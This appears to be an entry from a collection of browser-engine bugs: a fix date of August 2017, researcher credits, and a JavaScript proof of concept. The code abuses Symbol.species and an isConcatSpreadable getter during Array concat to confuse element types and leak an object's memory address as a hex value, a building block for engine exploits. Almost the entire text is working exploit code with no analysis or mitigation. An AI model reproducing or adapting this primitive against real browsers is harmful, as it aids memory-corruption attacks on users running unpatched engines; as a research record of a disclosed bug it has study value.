- Fix: Aug 2017
- Credit: Hao Linan of Qihoo 360 Vulcan Team, HyungSeok Han, @daramg of KAIST SoftSec
PoC from daramg
function convert(data){
a = new ArrayBuffer(8);
b = new Float64Array(a);
c = new Uint8Array(a);
b[0] = data;
ret = 0
for(i = 0; i<8; i++){
ret += c[7-i].toString(16)
}
return ret;
}
function leak(target){
var a1 = [];
for (var i = 0; i < 0x100; i++) {
a1[i] = i;
}
var a2 = [1234,1234];
var c = new Function();
c[Symbol.species] = function() {
new_array = [99,99,99];
return new_array;
};
a1.constructor = c;
a2.__defineGetter__(Symbol.isConcatSpreadable, function () {
new_array[0] = 4.2;
a2[0] = target
return true;
});
var res = a1.concat(a2);
return convert(res[256]) ;
}
a = [1,2,3]
v = leak(a)
console.log(v)